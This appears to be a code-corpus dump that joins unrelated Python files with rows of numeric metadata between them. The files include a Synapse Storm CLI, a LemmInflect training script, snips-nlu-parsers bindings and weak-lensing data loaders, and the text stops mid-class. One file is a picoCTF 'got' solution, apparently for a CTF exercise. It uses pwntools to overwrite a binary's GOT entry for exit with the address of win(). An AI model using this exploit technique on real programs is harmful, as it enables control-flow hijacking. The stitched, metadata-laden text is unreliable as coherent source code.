class HelpCmd(s_cli.CmdHelp):
'''
List interpreter extended commands and display help output.
Example:
!help foocmd
'''
_cmd_name = '!help'
class StormCliCmd(s_cli.Cmd):
# cut the Cmd instance over to using argparser and cmdrargv split
def getArgParser(self):
desc = self.getCmdDoc()
pars = s_cmd.Parser(prog=self._cmd_name, description=desc, outp=self._cmd_cli.outp)
return pars
def getCmdOpts(self, text):
pars = self.getArgParser()
argv = s_parser.Parser(text).cmdrargs()
return pars.parse_args(argv[1:])
class RunFileCmd(StormCliCmd):
'''
Run a local storm file.
Example:
!runfile /path/to/file.storm
'''
_cmd_name = '!runfile'
def getArgParser(self):
pars = StormCliCmd.getArgParser(self)
pars.add_argument('stormfile', help='A local file containing a storm query.')
return pars
async def runCmdOpts(self, opts):
if not os.path.isfile(opts.stormfile):
self.printf(f'no such file: {opts.stormfile}')
return
with open(opts.stormfile, 'rb') as fd:
text = fd.read().decode()
self.printf(f'running storm file: {opts.stormfile}')
await self._cmd_cli.storm(text)
class PushFileCmd(StormCliCmd):
'''
Upload a file and create a file:bytes node.
Example:
!pushfile /path/to/file
'''
_cmd_name = '!pushfile'
def getArgParser(self):
pars = StormCliCmd.getArgParser(self)
pars.add_argument('filepath', help='A local file to push to the Cortex.')
return pars
async def runCmdOpts(self, opts):
if not os.path.isfile(opts.filepath):
self.printf(f'no such file: {opts.filepath}')
return
self.printf(f'uploading file: {opts.filepath}')
async with await self._cmd_cli.item.getAxonUpload() as upload:
with open(opts.filepath, 'rb') as fd:
byts = fd.read(10000000)
while byts:
await upload.write(byts)
byts = fd.read(10000000)
size, sha256 = await upload.save()
opts = {'vars': {
'sha256': s_common.ehex(sha256),
'name': os.path.basename(opts.filepath),
}}
await self._cmd_cli.storm('[ file:bytes=$sha256 ] { -:name [:name=$name] }', opts=opts)
class PullFileCmd(StormCliCmd):
'''
Download a file by sha256 and store it locally.
Example:
!pullfile c00adfcc316f8b00772cdbce2505b9ea539d74f42861801eceb1017a44344ed3 /path/to/savefile
'''
_cmd_name = '!pullfile'
def getArgParser(self):
pars = StormCliCmd.getArgParser(self)
pars.add_argument('sha256', help='The SHA256 of the file to download.')
pars.add_argument('filepath', help='The file path to save the downloaded file to.')
return pars
async def runCmdOpts(self, opts):
self.printf(f'downloading sha256: {opts.sha256}')
try:
with s_common.genfile(opts.filepath) as fd:
async for byts in self._cmd_cli.item.getAxonBytes(opts.sha256):
byts = fd.write(byts)
self.printf(f'saved to: {opts.filepath}')
except asyncio.CancelledError as e:
raise
except s_exc.SynErr as e:
self.printf(e.errinfo.get('mesg', str(e)))
class ExportCmd(StormCliCmd):
'''
Export the results of a storm query into a nodes file.
Example:
// Export nodes to a file
!export dnsa.nodes { inet:fqdn#mynodes -> inet:dns:a }
// Export nodes to a file and only include specific tags
!export fqdn.nodes { inet:fqdn#mynodes } --include-tags footag
'''
_cmd_name = '!export'
def getArgParser(self):
pars = StormCliCmd.getArgParser(self)
pars.add_argument('filepath', help='The file path to save the export to.')
pars.add_argument('query', help='The Storm query to export nodes from.')
pars.add_argument('--include-tags', nargs='*', help='Only include the specified tags in output.')
pars.add_argument('--no-tags', default=False, action='store_true', help='Do not include any tags on exported nodes.')
return pars
async def runCmdOpts(self, opts):
self.printf('exporting nodes')
queryopts = {}
if opts.include_tags:
queryopts['scrub'] = {'include': {'tags': opts.include_tags}}
if opts.no_tags:
queryopts['scrub'] = {'include': {'tags': []}}
try:
query = opts.query[1:-1]
with s_common.genfile(opts.filepath) as fd:
cnt = 0
async for pode in self._cmd_cli.item.exportStorm(query, opts=queryopts):
byts = fd.write(s_msgpack.en(pode))
cnt += 1
self.printf(f'saved {cnt} nodes to: {opts.filepath}')
except asyncio.CancelledError as e:
raise
except s_exc.SynErr as e:
self.printf(e.errinfo.get('mesg', str(e)))
class StormCli(s_cli.Cli):
histfile = 'storm_history'
async def __anit__(self, item, outp=s_output.stdout, opts=None):
await s_cli.Cli.__anit__(self, item, outp=outp)
self.indented = False
self.cmdprompt = 'storm> '
self.stormopts = {'repr': True}
self.hidetags = False
self.hideprops = False
self._print_skips = []
def initCmdClasses(self):
self.addCmdClass(QuitCmd)
self.addCmdClass(HelpCmd)
self.addCmdClass(ExportCmd)
self.addCmdClass(RunFileCmd)
self.addCmdClass(PullFileCmd)
self.addCmdClass(PushFileCmd)
def printf(self, mesg, addnl=True, color=None):
if self.indented:
s_cli.Cli.printf(self, '')
self.indented = False
return s_cli.Cli.printf(self, mesg, addnl=addnl, color=color)
async def runCmdLine(self, line, opts=None):
if line[0] == '!':
return await s_cli.Cli.runCmdLine(self, line)
await self.storm(line, opts=opts)
async def handleErr(self, mesg):
err = mesg[1]
if err[0] == 'BadSyntax':
pos = err[1].get('at', None)
text = err[1].get('text', None)
tlen = len(text)
mesg = err[1].get('mesg', None)
if pos is not None and text is not None and mesg is not None:
text = text.replace('\n', ' ')
# Handle too-long text
if tlen > 60:
text = text[max(0, pos - 30):pos + 30]
if pos < tlen - 30:
text += '...'
if pos > 30:
text = '...' + text
pos = 33
self.printf(text)
self.printf(f'{" " * pos}^')
self.printf(f'Syntax Error: {mesg}', color=ERROR_COLOR)
return
text = err[1].get('mesg', err[0])
self.printf(f'ERROR: {text}', color=ERROR_COLOR)
def _printNodeProp(self, name, valu):
self.printf(f' {name} = {valu}')
async def storm(self, text, opts=None):
realopts = copy.deepcopy(self.stormopts)
if opts is not None:
realopts.update(opts)
async for mesg in self.item.storm(text, opts=realopts):
mtyp = mesg[0]
if mtyp in self._print_skips:
continue
if mtyp == 'node':
node = mesg[1]
formname, formvalu = s_node.reprNdef(node)
self.printf(f'{formname}={formvalu}')
if not self.hideprops:
for name in sorted(s_node.props(node).keys()):
valu = s_node.reprProp(node, name)
if name[0] != '.':
name = ':' + name
self._printNodeProp(name, valu)
if not self.hidetags:
for tag in sorted(s_node.tagsnice(node)):
valu = s_node.reprTag(node, tag)
tprops = s_node.reprTagProps(node, tag)
printed = False
if valu:
self.printf(f' #{tag} = {valu}')
printed = True
if tprops:
for prop, pval in tprops:
self.printf(f' #{tag}:{prop} = {pval}')
printed = True
if not printed:
self.printf(f' #{tag}')
elif mtyp == 'node:edits':
edit = mesg[1]
count = sum(len(e[2]) for e in edit.get('edits', ()))
s_cli.Cli.printf(self, '.' * count, addnl=False, color=NODEEDIT_COLOR)
self.indented = True
elif mtyp == 'fini':
took = mesg[1].get('took')
took = max(took, 1)
count = mesg[1].get('count')
pers = float(count) / float(took / 1000)
self.printf('complete. %d nodes in %d ms (%d/sec).' % (count, took, pers))
elif mtyp == 'print':
self.printf(mesg[1].get('mesg'))
elif mtyp == 'warn':
info = mesg[1]
warn = info.pop('mesg', '')
xtra = ', '.join([f'{k}={v}' for k, v in info.items()])
if xtra:
warn = ' '.join([warn, xtra])
self.printf(f'WARNING: {warn}', color=WARNING_COLOR)
elif mtyp == 'err':
await self.handleErr(mesg)
def getArgParser():
pars = argparse.ArgumentParser(prog='synapse.tools.storm')
pars.add_argument('cortex', help='A telepath URL for the Cortex.')
pars.add_argument('onecmd', nargs='?', help='A single storm command to run and exit.')
return pars
async def main(argv, outp=s_output.stdout):
pars = getArgParser()
opts = pars.parse_args(argv)
path = s_common.getSynPath('telepath.yaml')
telefini = await s_telepath.loadTeleEnv(path)
async with await s_telepath.openurl(opts.cortex) as proxy:
if telefini is not None:
proxy.onfini(telefini)
async with await StormCli.anit(proxy, outp=outp, opts=opts) as cli:
if opts.onecmd:
await cli.runCmdLine(opts.onecmd)
return
# pragma: no cover
cli.colorsenabled = True
cli.printf(welcome)
await cli.addSignalHandlers()
await cli.runCmdLoop()
if __name__ == '__main__': # pragma: no cover
sys.exit(asyncio.run(main(sys.argv[1:])))
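# Example invocations (the telepath URL is illustrative):
#   python -m synapse.tools.storm tcp://user:pass@cortex.host:27492
#   python -m synapse.tools.storm tcp://user:pass@cortex.host:27492 'inet:ipv4=1.2.3.4'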
| 29.589421
| 125
| 0.556823
| 1,397
| 11,747
| 4.600573
| 0.212598
| 0.034231
| 0.029096
| 0.014003
| 0.170842
| 0.137078
| 0.137078
| 0.129298
| 0.118718
| 0.118718
| 0
| 0.016973
| 0.327914
| 11,747
| 396
| 126
| 29.664141
| 0.797087
| 0.07338
| 0
| 0.164659
| 0
| 0
| 0.132979
| 0.001957
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040161
| false
| 0
| 0.064257
| 0
| 0.216867
| 0.144578
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1dcbdb70b490e3b7a9741698dbd0c921ce6d7ff
| 374
|
py
|
Python
|
Feature Selection/variance-thresholding-binary-features.py
|
WyckliffeAluga/data-chronicles
|
5219fe9cdbafb9fd7be88727483952c4c13f2790
|
[
"MIT"
] | null | null | null |
Feature Selection/variance-thresholding-binary-features.py
|
WyckliffeAluga/data-chronicles
|
5219fe9cdbafb9fd7be88727483952c4c13f2790
|
[
"MIT"
] | null | null | null |
Feature Selection/variance-thresholding-binary-features.py
|
WyckliffeAluga/data-chronicles
|
5219fe9cdbafb9fd7be88727483952c4c13f2790
|
[
"MIT"
] | 1
|
2021-02-09T12:22:55.000Z
|
2021-02-09T12:22:55.000Z
|
from sklearn.feature_selection import VarianceThreshold
# Create feature matrix with:
# Feature 0: 80% class 0
# Feature 1: 80% class 1
# Feature 2: 60% class 0, 40% class 1
X = [[0, 1, 0],
[0, 1, 1],
[0, 1, 0],
[0, 1, 1],
[1, 0, 0]]
# Drop features whose variance falls below the threshold
thresholder = VarianceThreshold(threshold=(.75 * (1 - .75)))
thresholder.fit_transform(X)
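# Why this works: threshold = .75 * (1 - .75) = 0.1875, and a Bernoulli
# feature has Var = p(1 - p). Features 0 and 1 each have an 80/20 split,
# so Var = 0.8 * 0.2 = 0.16 and both are dropped; feature 2 has a 60/40
# split, Var = 0.24, and survives, so fit_transform(X) returns only the
# third column.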
| 23.375
| 60
| 0.628342
| 58
| 374
| 4.017241
| 0.431034
| 0.034335
| 0.038627
| 0.034335
| 0.051502
| 0.051502
| 0
| 0
| 0
| 0
| 0
| 0.119863
| 0.219251
| 374
| 15
| 61
| 24.933333
| 0.678082
| 0.360963
| 0
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.125
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1dd06b091ae6fa97dc90f3e28bc1d5770af8082
| 1,677
|
py
|
Python
|
scripts/03_BuildLITypeModels/14_TrainLemmaModel.py
|
danielplatt/LemmInflect
|
7db0633098409800fbe7056bdab7d6f5f144cebb
|
[
"MIT"
] | 157
|
2019-05-11T21:17:20.000Z
|
2022-03-21T12:05:12.000Z
|
scripts/03_BuildLITypeModels/14_TrainLemmaModel.py
|
danielplatt/LemmInflect
|
7db0633098409800fbe7056bdab7d6f5f144cebb
|
[
"MIT"
] | 10
|
2019-05-14T19:49:04.000Z
|
2021-06-03T13:15:16.000Z
|
scripts/03_BuildLITypeModels/14_TrainLemmaModel.py
|
danielplatt/LemmInflect
|
7db0633098409800fbe7056bdab7d6f5f144cebb
|
[
"MIT"
] | 20
|
2019-08-21T12:40:51.000Z
|
2021-10-02T15:06:07.000Z
|
#!/usr/bin/python3
import sys
sys.path.insert(0, '../..') # make '../..' first in the lib search path
import gzip
import numpy
from lemminflect.kmodels.ModelLemma import ModelLemma
from lemminflect.kmodels.ModelLemmaInData import ModelLemmaInData
from lemminflect.kmodels.ModelLemmaClasses import ModelLemmaClasses
from lemminflect import config
if __name__ == '__main__':
# Load the lemmatization data
print('Loading ', config.lemma_tcorp_fn)
indata = ModelLemmaInData(config.lemma_tcorp_fn)
print('Loaded {:,} entries'.format(len(indata.entries)))
# Load the lemmatization rules
print('Loading ', config.model_lemma_cl_fn)
rules = ModelLemmaClasses(config.model_lemma_cl_fn)
# Convert data into training format
X = []
Y = []
input_len = ModelLemmaInData.WVEC_LEN
input_letters = ModelLemmaInData.getLetterClasses()
output_rules = rules.rules
for entry in indata.entries:
rule = ModelLemmaClasses.computeSuffixRule(entry.infl, entry.lemma)
idx = rules.getRuleIndex(rule)
vec = ModelLemmaInData.wordToVec(entry.infl, entry.category)
X.append( vec )
Y.append( idx )
X = numpy.asarray(X, dtype='float32')
Y = numpy.asarray(Y, dtype='int32')
print('X.shape= ', X.shape)
print('Y.shape= ', Y.shape)
print()
# Create the model
batch_size = 32
nepochs = 50
model = ModelLemma()
model.create(input_len, input_letters, output_rules)
model.model.summary()
model.train(X, Y, batch_size, nepochs)
print()
print('Saving model to ', config.model_lemma_fn)
model.save(config.model_lemma_fn)
print('done')
| 31.641509
| 75
| 0.690519
| 203
| 1,677
| 5.551724
| 0.394089
| 0.053239
| 0.056788
| 0.031943
| 0.035492
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007468
| 0.20155
| 1,677
| 52
| 76
| 32.25
| 0.834205
| 0.097794
| 0
| 0.05
| 0
| 0
| 0.06503
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.175
| 0
| 0.175
| 0.225
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1dd06cdb53d42d5c3f71ef66179e31f525e4e55
| 9,006
|
py
|
Python
|
python/snips_nlu_parsers/builtin_entities.py
|
f-laurens/snips-nlu-parsers
|
82d24c0b4258acd1191af5d558b7592a18f2dada
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 14
|
2019-04-17T15:10:39.000Z
|
2022-02-14T09:38:47.000Z
|
python/snips_nlu_parsers/builtin_entities.py
|
f-laurens/snips-nlu-parsers
|
82d24c0b4258acd1191af5d558b7592a18f2dada
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 4
|
2019-04-07T19:36:24.000Z
|
2020-05-28T12:46:37.000Z
|
python/snips_nlu_parsers/builtin_entities.py
|
f-laurens/snips-nlu-parsers
|
82d24c0b4258acd1191af5d558b7592a18f2dada
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 43
|
2019-04-20T07:31:57.000Z
|
2022-01-12T16:24:13.000Z
|
# coding=utf-8
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import json
from _ctypes import byref, pointer
from builtins import range, str
from ctypes import c_char_p, string_at
from snips_nlu_parsers.utils import (CStringArray, check_ffi_error, lib,
string_array_pointer, string_pointer)
_ALL_LANGUAGES = None
_SUPPORTED_ENTITIES = dict()
_SUPPORTED_GAZETTEER_ENTITIES = dict()
_SUPPORTED_GRAMMAR_ENTITIES = dict()
_ENTITIES_EXAMPLES = dict()
_ALL_BUILTIN_ENTITIES = None
_ALL_GAZETTEER_ENTITIES = None
_ALL_GRAMMAR_ENTITIES = None
_BUILTIN_ENTITIES_SHORTNAMES = dict()
_COMPLETE_ENTITY_ONTOLOGY = None
_LANGUAGE_ENTITY_ONTOLOGY = dict()
def get_all_languages():
"""Lists all the supported languages"""
global _ALL_LANGUAGES
if _ALL_LANGUAGES is None:
lib.snips_nlu_ontology_supported_languages.restype = CStringArray
array = lib.snips_nlu_ontology_supported_languages()
_ALL_LANGUAGES = set(
array.data[i].decode("utf8") for i in range(array.size))
return _ALL_LANGUAGES
def get_all_builtin_entities():
"""Lists the builtin entities that are supported in at least one
language"""
global _ALL_BUILTIN_ENTITIES
if _ALL_BUILTIN_ENTITIES is None:
lib.snips_nlu_ontology_all_builtin_entities.restype = CStringArray
array = lib.snips_nlu_ontology_all_builtin_entities()
_ALL_BUILTIN_ENTITIES = set(
array.data[i].decode("utf8") for i in range(array.size))
return _ALL_BUILTIN_ENTITIES
def get_all_gazetteer_entities():
"""Lists the gazetteer entities that are supported in at least one
language"""
global _ALL_GAZETTEER_ENTITIES
if _ALL_GAZETTEER_ENTITIES is None:
lib.snips_nlu_ontology_all_gazetteer_entities.restype = CStringArray
array = lib.snips_nlu_ontology_all_gazetteer_entities()
_ALL_GAZETTEER_ENTITIES = set(
array.data[i].decode("utf8") for i in range(array.size))
return _ALL_GAZETTEER_ENTITIES
def get_all_grammar_entities():
"""Lists the grammar entities that are supported in at least one
language"""
global _ALL_GRAMMAR_ENTITIES
if _ALL_GRAMMAR_ENTITIES is None:
lib.snips_nlu_ontology_all_grammar_entities.restype = CStringArray
array = lib.snips_nlu_ontology_all_grammar_entities()
_ALL_GRAMMAR_ENTITIES = set(
array.data[i].decode("utf8") for i in range(array.size))
return _ALL_GRAMMAR_ENTITIES
def get_builtin_entity_shortname(entity):
"""Get the short name of the entity
Examples:
>>> get_builtin_entity_shortname(u"snips/amountOfMoney")
'AmountOfMoney'
"""
global _BUILTIN_ENTITIES_SHORTNAMES
if entity not in _BUILTIN_ENTITIES_SHORTNAMES:
with string_pointer(c_char_p()) as ptr:
exit_code = lib.snips_nlu_ontology_entity_shortname(
entity.encode("utf8"), byref(ptr))
check_ffi_error(exit_code, "Something went wrong when retrieving "
"builtin entity shortname")
result = string_at(ptr)
_BUILTIN_ENTITIES_SHORTNAMES[entity] = result.decode("utf8")
return _BUILTIN_ENTITIES_SHORTNAMES[entity]
def get_supported_entities(language):
"""Lists the builtin entities supported in the specified *language*
Returns:
list of str: the list of entity labels
"""
global _SUPPORTED_ENTITIES
if not isinstance(language, str):
raise TypeError("Expected language to be of type 'str' but found: %s"
% type(language))
if language not in _SUPPORTED_ENTITIES:
with string_array_pointer(pointer(CStringArray())) as ptr:
exit_code = lib.snips_nlu_parsers_supported_builtin_entities(
language.encode("utf8"), byref(ptr))
check_ffi_error(exit_code, "Something went wrong when retrieving "
"supported entities")
array = ptr.contents
_SUPPORTED_ENTITIES[language] = set(
array.data[i].decode("utf8") for i in range(array.size))
return _SUPPORTED_ENTITIES[language]
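# For example, get_supported_entities("en") returns a set of entity labels
# such as "snips/number" and "snips/datetime" (the exact set depends on the
# parsers build).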
def get_supported_gazetteer_entities(language):
"""Lists the gazetteer entities supported in the specified *language*
Returns:
list of str: the list of entity labels
"""
global _SUPPORTED_GAZETTEER_ENTITIES
if not isinstance(language, str):
raise TypeError("Expected language to be of type 'str' but found: %s"
% type(language))
if language not in _SUPPORTED_GAZETTEER_ENTITIES:
with string_array_pointer(pointer(CStringArray())) as ptr:
exit_code = \
lib.snips_nlu_parsers_supported_builtin_gazetteer_entities(
language.encode("utf8"), byref(ptr))
check_ffi_error(exit_code, "Something went wrong when retrieving "
"supported gazetteer entities")
array = ptr.contents
_SUPPORTED_GAZETTEER_ENTITIES[language] = set(
array.data[i].decode("utf8") for i in range(array.size))
return _SUPPORTED_GAZETTEER_ENTITIES[language]
def get_supported_grammar_entities(language):
"""Lists the grammar entities supported in the specified *language*
Returns:
list of str: the list of entity labels
"""
global _SUPPORTED_GRAMMAR_ENTITIES
if not isinstance(language, str):
raise TypeError("Expected language to be of type 'str' but found: %s"
% type(language))
if language not in _SUPPORTED_GRAMMAR_ENTITIES:
with string_array_pointer(pointer(CStringArray())) as ptr:
exit_code = lib.snips_nlu_parsers_supported_grammar_entities(
language.encode("utf8"), byref(ptr))
check_ffi_error(exit_code, "Something went wrong when retrieving "
"supported grammar entities")
array = ptr.contents
_SUPPORTED_GRAMMAR_ENTITIES[language] = set(
array.data[i].decode("utf8") for i in range(array.size))
return _SUPPORTED_GRAMMAR_ENTITIES[language]
def get_builtin_entity_examples(builtin_entity_kind, language):
"""Provides some examples of the builtin entity in the specified language
"""
global _ENTITIES_EXAMPLES
if not isinstance(builtin_entity_kind, str):
raise TypeError("Expected `builtin_entity_kind` to be of type 'str' "
"but found: %s" % type(builtin_entity_kind))
if not isinstance(language, str):
raise TypeError("Expected `language` to be of type 'str' but found: %s"
% type(language))
if builtin_entity_kind not in _ENTITIES_EXAMPLES:
_ENTITIES_EXAMPLES[builtin_entity_kind] = dict()
if language not in _ENTITIES_EXAMPLES[builtin_entity_kind]:
with string_array_pointer(pointer(CStringArray())) as ptr:
exit_code = lib.snips_nlu_parsers_builtin_entity_examples(
builtin_entity_kind.encode("utf8"),
language.encode("utf8"), byref(ptr))
check_ffi_error(exit_code, "Something went wrong when retrieving "
"builtin entity examples")
array = ptr.contents
_ENTITIES_EXAMPLES[builtin_entity_kind][language] = list(
array.data[i].decode("utf8") for i in range(array.size))
return _ENTITIES_EXAMPLES[builtin_entity_kind][language]
def get_complete_entity_ontology():
"""Lists the complete entity ontology for all languages in JSON format
"""
global _COMPLETE_ENTITY_ONTOLOGY
if _COMPLETE_ENTITY_ONTOLOGY is None:
with string_pointer(c_char_p()) as ptr:
exit_code = lib.snips_nlu_parsers_complete_entity_ontology_json(byref(ptr))
check_ffi_error(exit_code, "Something went wrong when retrieving "
"complete entity ontology")
json_str = string_at(ptr).decode("utf8")
_COMPLETE_ENTITY_ONTOLOGY = json.loads(json_str, encoding="utf8")
return _COMPLETE_ENTITY_ONTOLOGY
def get_language_entity_ontology(language):
"""Lists the complete entity ontology for the specified language in JSON format
"""
global _LANGUAGE_ENTITY_ONTOLOGY
if language not in _LANGUAGE_ENTITY_ONTOLOGY:
with string_pointer(c_char_p()) as ptr:
exit_code = lib.snips_nlu_parsers_language_entity_ontology_json(
language.encode("utf8"), byref(ptr))
check_ffi_error(exit_code, "Something went wrong when retrieving "
"language entity ontology")
json_str = string_at(ptr).decode("utf8")
_LANGUAGE_ENTITY_ONTOLOGY[language] = json.loads(json_str, encoding="utf8")
return _LANGUAGE_ENTITY_ONTOLOGY[language]
| 40.751131
| 87
| 0.67777
| 1,069
| 9,006
| 5.379794
| 0.1029
| 0.053208
| 0.028691
| 0.029734
| 0.623022
| 0.58216
| 0.532603
| 0.50113
| 0.482351
| 0.435055
| 0
| 0.003106
| 0.249167
| 9,006
| 220
| 88
| 40.936364
| 0.847382
| 0.108039
| 0
| 0.293333
| 0
| 0
| 0.098116
| 0.002655
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073333
| false
| 0
| 0.04
| 0
| 0.186667
| 0.006667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1decafed3dd9912b1ab456a5f7d5b245e48033e
| 521
|
py
|
Python
|
picoctf-2019/got/shellcode.py
|
onealmond/hacking-lab
|
631e615944add02db3c2afef47bf1de7171eb065
|
[
"MIT"
] | 9
|
2021-04-20T15:28:36.000Z
|
2022-03-08T19:53:48.000Z
|
picoctf-2019/got/shellcode.py
|
onealmond/hacking-lab
|
631e615944add02db3c2afef47bf1de7171eb065
|
[
"MIT"
] | null | null | null |
picoctf-2019/got/shellcode.py
|
onealmond/hacking-lab
|
631e615944add02db3c2afef47bf1de7171eb065
|
[
"MIT"
] | 6
|
2021-06-24T03:25:21.000Z
|
2022-02-20T21:44:52.000Z
|
import os;os.environ['TMPDIR'] = os.path.join(os.environ['HOME'], 'tmp')
import pwn
remote_binary = "/problems/got_5_c5119617c90aa544a639812dbc41e24e/vuln"
def segfault():
try:
pr = pwn.process(remote_binary)
elf = pwn.ELF(remote_binary, False)
print(elf.got)
pr.sendlineafter("Input address\n", str(elf.got["exit"]))
pr.sendlineafter("Input value?\n", str(elf.sym["win"]))
rsp = pr.readall(timeout=0.5)
print(rsp)
finally:
pr.close()
segfault()
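# How the exploit works: the vuln binary asks for an address and a value and
# writes the value there, so pointing exit's GOT entry at win() redirects the
# program into win() (which presumably prints the flag) when it exits.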
| 27.421053
| 72
| 0.629559
| 68
| 521
| 4.75
| 0.573529
| 0.111455
| 0.123839
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.06068
| 0.209213
| 521
| 18
| 73
| 28.944444
| 0.723301
| 0
| 0
| 0
| 0
| 0
| 0.195777
| 0.101727
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.133333
| 0
| 0.2
| 0.133333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1e15b839857a50eb242db9bce20dc2231b79a03
| 9,518
|
py
|
Python
|
miscellaneous/utils.py
|
tingyuansen/Weak_Lensing
|
f8f0833345687648c467b4dea7074d9596c81c14
|
[
"MIT"
] | null | null | null |
miscellaneous/utils.py
|
tingyuansen/Weak_Lensing
|
f8f0833345687648c467b4dea7074d9596c81c14
|
[
"MIT"
] | null | null | null |
miscellaneous/utils.py
|
tingyuansen/Weak_Lensing
|
f8f0833345687648c467b4dea7074d9596c81c14
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# *Author: Dezso Ribli*
"""
Util functions for training CNN on weak lensing maps.
Mostly data loaders and data generators with some
additional functionality.
"""
import numpy as np
# https://github.com/IntelPython/mkl_fft/issues/11
#np.fft.restore_all()
import cv2
import math
import os
def step_decay(epoch, base_lr, epochs_drop, drop=0.1):
"""Helper for step learning rate decay."""
lrate = base_lr
for epoch_drop in epochs_drop:
lrate *= math.pow(drop,math.floor(epoch/epoch_drop))
return lrate
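# Worked example: with base_lr=0.01, epochs_drop=[10] and the default
# drop=0.1, step_decay(5, 0.01, [10]) -> 0.01 (floor(5/10) = 0) while
# step_decay(12, 0.01, [10]) -> 0.001 (floor(12/10) = 1).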
def load_training_data(mapsize=512, grfized=False, exclude_fid=False,
dense_grid=False, random_split=False,
from_files=False):
"""Load data for different training scenarios."""
if not grfized and (not dense_grid) and (not random_split):
# the default data to load
X_train, X_test, y_train, y_test = load_sparse_grid(imsize=mapsize,
from_files=from_files)
elif grfized:
# equivalent gaussian random filed maps
assert not from_files
X_train, X_test, y_train, y_test = load_grf_sparse_grid()
elif dense_grid:
assert not from_files
# data with additional points around a cosmology
X_train, X_test, y_train, y_test = load_dense_grid(imsize=mapsize)
elif random_split:
# random train and test split
X_train, X_test, y_train, y_test = load_randomsplit_grid(
imsize=mapsize, from_files=from_files)
# always predict new idf, why not, it takes no time
# anyway we will not use it with the experiments
fn = '../../data/columbia_data_fiducial_new_idf_pix'+str(mapsize)+'.npy'
X_new_idf = np.load(fn)
y_new_idf = np.ones((len(y_test),2))
y_new_idf[:,0], y_new_idf[:,1] = 0.309, 0.816
if exclude_fid: # exclude fiducial cosmo params if asked for
idx = (y_train[:,0] == 0.309) & (y_train[:,1] == 0.816)
X_train, y_train = X_train[~idx], y_train[~idx]
return X_train, X_test, X_new_idf, y_train, y_test, y_new_idf
def load_sparse_grid(d='../../data/sparsegrid/', imsize = 512,
from_files=False):
if from_files: # only load filenames
X_train = np.arange(len(os.listdir(os.path.join(d, 'train'))))
X_test = np.arange(len(os.listdir(os.path.join(d, 'test'))))
else: # load the files themselves
X_train = np.load(d+'sparse_grid_final_'+str(imsize)+'pix_x_train.npy')
X_test = np.load(d+'sparse_grid_final_'+str(imsize)+'pix_x_test.npy')
y_train = np.load(d+'sparse_grid_final_'+str(imsize)+'pix_y_train.npy')
y_test = np.load(d+'sparse_grid_final_'+str(imsize)+'pix_y_test.npy')
return X_train, X_test, y_train, y_test
"""Loaders for various experiments."""
def load_grf_sparse_grid(d='../../data/grf/', case='a',imsize=512):
X_train = np.load(d+'grf'+case+'_sparse_grid_final_'+str(imsize)+'pix_x_train.npy')
X_test = np.load(d+'grf'+case+'_sparse_grid_final_'+str(imsize)+'pix_x_test.npy')
y_train = np.load(d+'grf_sparse_grid_final_'+str(imsize)+'pix_y_train.npy')
y_test = np.load(d+'grf_sparse_grid_final_'+str(imsize)+'pix_y_test.npy')
return X_train, X_test, y_train, y_test
def load_dense_grid(d='../../data/densegrid/', imsize = 512):
X_train = np.load(d+'dense_grid_final_'+str(imsize)+'pix_x_train.npy')
X_test = np.load(d+'dense_grid_final_'+str(imsize)+'pix_x_test.npy')
y_train = np.load(d+'dense_grid_final_'+str(imsize)+'pix_y_train.npy')
y_test = np.load(d+'dense_grid_final_'+str(imsize)+'pix_y_test.npy')
return X_train, X_test, y_train, y_test
def load_randomsplit_grid(d='../../data/randomsplit/sparse_512/', imsize = 512,
from_files=False):
if from_files: # only load filenames
X_train = np.arange(len(os.listdir(os.path.join(d, 'train'))))
X_test = np.arange(len(os.listdir(os.path.join(d, 'test'))))
else: # load the files themselves
X_train = np.load(d+'sparse_randomsplit_'+str(imsize)+'pix_x_train.npy')
X_test = np.load(d+'sparse_randomsplit_'+str(imsize)+'pix_x_test.npy')
y_train = np.load(d+'sparse_randomsplit_'+str(imsize)+'pix_y_train.npy')
y_test = np.load(d+'sparse_randomsplit_'+str(imsize)+'pix_y_test.npy')
return X_train, X_test, y_train, y_test
class DataGenerator():
"""
Data generator.
Generates minibatches of data and labels.
Usage:
g = DataGenerator(data, labels)
"""
